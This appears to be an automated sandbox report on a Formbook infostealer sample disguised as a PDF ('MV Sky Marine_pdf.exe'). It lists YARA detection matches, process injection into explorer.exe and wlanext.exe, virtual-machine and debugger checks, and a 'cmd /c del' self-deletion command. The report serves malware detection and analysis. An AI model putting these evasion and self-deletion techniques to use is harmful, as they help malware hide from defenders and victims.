Source: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.275618923.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.275618923.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.496617029.0000000000F50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.496617029.0000000000F50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.496712195.0000000000F80000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.496712195.0000000000F80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.235033668.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.235033668.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.MV Sky Marine_pdf.exe.2670000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.MV Sky Marine_pdf.exe.2670000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.MV Sky Marine_pdf.exe.2670000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.MV Sky Marine_pdf.exe.2670000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/2@15/9
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 2_2_0040441E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 2_2_0040441E
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 2_2_10004347 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW, 2_2_10004347
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 2_2_00402053 CoCreateInstance,MultiByteToWideChar, 2_2_00402053
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5916:120:WilError_01
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | File created: C:\Users\user\AppData\Local\Temp\nssBDFC.tmp
          Source: MV Sky Marine_pdf.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: MV Sky Marine_pdf.exe | Virustotal: Detection: 33%
          Source: MV Sky Marine_pdf.exe | ReversingLabs: Detection: 23%
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | File read: C:\Users\user\Desktop\MV Sky Marine_pdf.exe
          Source: unknown | Process created: C:\Users\user\Desktop\MV Sky Marine_pdf.exe 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe'
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Process created: C:\Users\user\Desktop\MV Sky Marine_pdf.exe 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe'
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Process created: C:\Users\user\Desktop\MV Sky Marine_pdf.exe 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe'
          Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe'
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wntdll.pdbUGP | source: MV Sky Marine_pdf.exe, 00000002.00000003.231397905.0000000002D30000.00000004.00000001.sdmp, MV Sky Marine_pdf.exe, 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, wlanext.exe, 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb | source: MV Sky Marine_pdf.exe, wlanext.exe
          Source: Binary string: wlanext.pdb | source: MV Sky Marine_pdf.exe, 00000003.00000002.275693776.0000000000A40000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL | source: MV Sky Marine_pdf.exe, 00000003.00000002.275693776.0000000000A40000.00000040.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Unpacked PE file: 3.2.MV Sky Marine_pdf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00416091 pushfd ; ret 3_2_00416096
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_0041617D push esi; retf 3_2_00416188
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_0040DACD push edx; retf 3_2_0040DACE
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_0041B3F2 push eax; ret 3_2_0041B3F8
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_0041B3FB push eax; ret 3_2_0041B462
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_0041B3A5 push eax; ret 3_2_0041B3F8
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_0041B45C push eax; ret 3_2_0041B462
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_004037A9 push cs; ret 3_2_004037AC
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B0D0D1 push ecx; ret 3_2_00B0D0E4
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_1_00416091 pushfd ; ret 3_1_00416096
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_1_0041617D push esi; retf 3_1_00416188
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_1_0040DACD push edx; retf 3_1_0040DACE
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_1_0041B3F2 push eax; ret 3_1_0041B3F8
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_1_0041B3FB push eax; ret 3_1_0041B462
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_1_0041B3A5 push eax; ret 3_1_0041B3F8
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_1_0041B45C push eax; ret 3_1_0041B462
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_033AD0D1 push ecx; ret 8_2_033AD0E4
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_00AA6091 pushfd ; ret 8_2_00AA6096
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_00AAC0E3 push eax; retf 8_2_00AAC0E4
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_00AA617D push esi; retf 8_2_00AA6188
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_00A9DACD push edx; retf 8_2_00A9DACE
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_00AAB3A5 push eax; ret 8_2_00AAB3F8
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_00AAB3FB push eax; ret 8_2_00AAB462
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_00AAB3F2 push eax; ret 8_2_00AAB3F8
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_00AAC360 push es; iretd 8_2_00AAC362
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_00AAB45C push eax; ret 8_2_00AAB462
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_00A937A9 push cs; ret 8_2_00A937AC
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | File created: C:\Users\user\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: 0000000000A985E4 second address: 0000000000A985EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: 0000000000A9896E second address: 0000000000A98974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_004088A0 rdtsc 3_2_004088A0
          Source: C:\Windows\explorer.exe TID: 6292 | Thread sleep time: -65000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 6208 | Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 2_2_00405649 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 2_2_00405649
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 2_2_0040601F FindFirstFileA,FindClose, 2_2_0040601F
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 2_2_00402671 FindFirstFileA, 2_2_00402671
          Source: explorer.exe, 00000004.00000000.255100372.000000000891C000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.241818269.0000000003710000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.253312981.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.238635954.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000004.00000000.255142797.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000002.508709868.00000000053C4000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.253312981.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.253312981.0000000008270000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.255142797.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000004.00000000.253312981.0000000008270000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_004088A0 rdtsc 3_2_004088A0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00409B10 LdrLoadDll, 3_2_00409B10
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 2_2_100047B8 mov eax, dword ptr fs:[00000030h] 2_2_100047B8
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 2_2_100049BB mov eax, dword ptr fs:[00000030h] 2_2_100049BB
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF90AF mov eax, dword ptr fs:[00000030h] 3_2_00AF90AF
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE20A0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE20A0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE20A0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE20A0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE20A0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE20A0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AEF0BF mov ecx, dword ptr fs:[00000030h] 3_2_00AEF0BF
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AEF0BF mov eax, dword ptr fs:[00000030h] 3_2_00AEF0BF
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AEF0BF mov eax, dword ptr fs:[00000030h] 3_2_00AEF0BF
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AB9080 mov eax, dword ptr fs:[00000030h] 3_2_00AB9080
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B33884 mov eax, dword ptr fs:[00000030h] 3_2_00B33884
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B33884 mov eax, dword ptr fs:[00000030h] 3_2_00B33884
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AB58EC mov eax, dword ptr fs:[00000030h] 3_2_00AB58EC
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00B4B8D0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B4B8D0 mov ecx, dword ptr fs:[00000030h] 3_2_00B4B8D0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00B4B8D0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00B4B8D0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00B4B8D0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00B4B8D0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h] 3_2_00AE002D
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h] 3_2_00AE002D
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h] 3_2_00AE002D
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h] 3_2_00AE002D
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h] 3_2_00AE002D
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h] 3_2_00ACB02A
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h] 3_2_00ACB02A
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h] 3_2_00ACB02A
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h] 3_2_00ACB02A
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h] 3_2_00B37016
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h] 3_2_00B37016
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h] 3_2_00B37016
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B84015 mov eax, dword ptr fs:[00000030h] 3_2_00B84015
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B84015 mov eax, dword ptr fs:[00000030h] 3_2_00B84015
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B72073 mov eax, dword ptr fs:[00000030h] 3_2_00B72073
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B81074 mov eax, dword ptr fs:[00000030h] 3_2_00B81074
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AD0050 mov eax, dword ptr fs:[00000030h] 3_2_00AD0050
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AD0050 mov eax, dword ptr fs:[00000030h] 3_2_00AD0050
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h] 3_2_00B351BE
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h] 3_2_00B351BE
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h] 3_2_00B351BE
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h] 3_2_00B351BE
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AE61A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE61A0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AE61A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE61A0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B369A6 mov eax, dword ptr fs:[00000030h] 3_2_00B369A6
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AEA185 mov eax, dword ptr fs:[00000030h] 3_2_00AEA185
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00ADC182 mov eax, dword ptr fs:[00000030h] 3_2_00ADC182
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AE2990 mov eax, dword ptr fs:[00000030h] 3_2_00AE2990
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h] 3_2_00ABB1E1
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h] 3_2_00ABB1E1
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h] 3_2_00ABB1E1
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B441E8 mov eax, dword ptr fs:[00000030h] 3_2_00B441E8
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h] 3_2_00AD4120
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h] 3_2_00AD4120
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h] 3_2_00AD4120
